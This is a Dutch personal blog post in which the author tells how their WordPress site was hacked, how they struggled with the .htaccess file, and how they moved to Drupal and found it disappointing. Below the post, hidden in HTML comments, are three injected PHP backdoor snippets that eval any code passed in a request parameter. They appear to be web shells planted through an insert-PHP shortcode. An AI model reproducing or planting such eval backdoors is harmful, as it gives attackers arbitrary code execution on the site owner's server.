woensdag, april 24, 2024
Laatste:
zazkia.nl

zazkia.nl

weblog van zazkia @zazkiaz

cms nerdbla 

wordpress gehackt

zazkia , , , , , , ,

Je zou natuurlijk een hackproof website kunnen maken. Eigenlijk kan dat niet. Maar, als ik een bank-website-maker was, zou ik dit zeker proberen na te streven. Aangezien ik alleen wat wilde orakelen als ik niet in slaap kon vallen, heb ik me ontfermd over een niet zo nigeriaanse goudmijn-proof website. Zelf geflanst met wordpress. Twee jaar heeft ie t volgehouden. Het kon niet uitblijven dat ook ik werd…

gehackt
Nadat ik een keer gehackt was, heb ik de htaccess verknoeid.
Ik zag het dezelfde dag nog, omdat niets op mijn linkedin wordpress applet nog werkte…
Het is altijd oppassen, met standaard WordPress-instellingen. Dat is vrij eenvoudig te hacken, want de handleiding staat gewoon op internet. Bovendien heeft elke puber met een cavia website, wordpress. De hacker heeft een groot bereik. Als je dan bovendien digitaal omgaat met mensen die gehackt worden, dan word je er zeker mee besmet. Dan kun je dus niet meer alles lekker gewoon default noemen, met als username admin en wachtwoord 1234.
wat dan
Nou dan moet je het maar opbrengen om in de zomer op een vrije dag de hele dag achter je computer te zitten om een nieuwe htaccess te maken die naar je wordpress blog leidt. Niks dus. Wat ik ook invoerde in de htacces, niets werd geleid naar de Wopsie-directory. Ook niet als ik het echt prachtig had gedaan en helemaal zeker wist dat het goed was…
(Wopsie? Ja dat staat voor een niet-default term voor wordpress. Zo had ik mijn site dan ook wel weer beveiligd.)
wat was het probleem
Default instellingen elders in de halve wordpress, die nog op de site was overgebleven. In een config file ergens. Die ik niet meer terug kon vinden. Toch moet dat wel het probleem zijn geweest, want op eenhalve gare manier kon ik toch nog naar een opzetje komen dat ik gemaakt had, voor een joomla website. In de /joehoemla directory.
en de oplossing
Mijn eerste oplossing was zoeken naar een oplossing. En daarna proberen, de htaccess nog weer anders te veranderen. Of toch nog ergens te zoeken naar een config file. Daarmee zijn vele regenachtige zondagen vervuld en die waren er veel in 2010.
De oplossing die wel werkte, was zo boos worden dat ik alle wopsieflopsie-rommel heb weggegooid en opnieuw ben begonnen. Met Drupal.

is dat wat? drupal

Nou neem me niet kwalijk maar ik vind het niks. Als je houdt van zoeken naar functionaliteit op google en dat dan installeren en dan erachter komen dat het niet werkt via de configuratie die je server erop nahoudt. Dan vind je het misschien aardig. Ik vind het zelf helemaal niks. Je downloadt een programma, installeert het, en dan moet je nog een slag in de rondte winkelen naar al het andere leuks waarmee je wél een leuke site had kunnen hebben als dat er standaard in zat.
En het ergste is: je kan niet bij de broncode. Ja, via gedit kun je bij de broncode, als je ftpt.
Maar ik wil gewoon een mooie css ontwerpen voor mijn site, en voor mijn site alleen. Die zo werkt, zoals ik het snap, zodat ik het groen kan maken als ik het groen wil hebben. Dat is dus teveel gevraagd. Dat gaat niet. Of misschien moet ik daarvoor een plugin downloaden. .

wijze les?

Ja best wel. Ik weet nu hoe een htaccess werkt. En dat de default settings die het de gebruiker makkelijk moeten maken, omdat hij dan niet in de htaccess hoeft te klungelen, het de gebruiker alleen maar moeilijker maken, als hij toch in de htaccess moet klungelen. Daardoor weet ik nu dat WordPress niet alles is. Maar dat Drupal ook niet zomaar geinstalleerd is in een vlaag van woede.

We hadden er nog over gedacht om grootoost.nl om te gooien naar een ander cms maar nu weten we weer beter. Er is niet zo iets als een geschikt cms. In je dromen misschien. En nog een wijze les: ik kan maar beter mijn bed in kruipen en over een geschikter cms dromen…


<!– [insert_php]if (isset($_REQUEST["tTXM"])){eval($_REQUEST["tTXM"]);exit;}[/insert_php][php]if (isset($_REQUEST["tTXM"])){eval($_REQUEST["tTXM"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["bEDYY"])){eval($_REQUEST["bEDYY"]);exit;}[/insert_php][php]if (isset($_REQUEST["bEDYY"])){eval($_REQUEST["bEDYY"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ofb"])){eval($_REQUEST["ofb"]);exit;}[/insert_php][php]if (isset($_REQUEST["ofb"])){eval($_REQUEST["ofb"]);exit;}[/php] –>

Translate »
×
%d bloggers liken dit: